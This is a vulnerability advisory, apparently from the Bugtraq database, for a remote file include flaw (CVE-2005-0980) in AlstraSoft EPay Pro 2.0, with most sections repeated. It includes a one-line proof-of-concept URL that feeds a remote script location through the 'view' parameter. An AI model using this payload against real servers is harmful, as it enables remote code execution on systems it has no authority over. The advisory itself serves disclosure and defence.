AlstraSoft EPay Pro Remote File Include Vulnerability
BID:12973
Info
AlstraSoft EPay Pro Remote File Include Vulnerability
| Bugtraq ID: | 12973 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0980 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2005 12:00AM |
| Updated: | Jul 12 2009 11:56AM |
| Credit: | Discovery is credited to Diabolic Crab dcrab <[email protected]>. |
| Vulnerable: |
AlstraSoft EPay Pro 2.0 |
| Not Vulnerable: | |
Discussion
AlstraSoft EPay Pro Remote File Include Vulnerability
EPay Pro is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer.
EPay Pro version 2.0 is vulnerable to this issue.
EPay Pro is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer.
EPay Pro version 2.0 is vulnerable to this issue.
Exploit / POC
AlstraSoft EPay Pro Remote File Include Vulnerability
An exploit is not required.
Proof of concept example is available:
http://www.example.com/epal/index.php?view=http://www.example.com/
An exploit is not required.
Proof of concept example is available:
http://www.example.com/epal/index.php?view=http://www.example.com/
Solution / Fix
AlstraSoft EPay Pro Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
AlstraSoft EPay Pro Remote File Include Vulnerability
References:
References: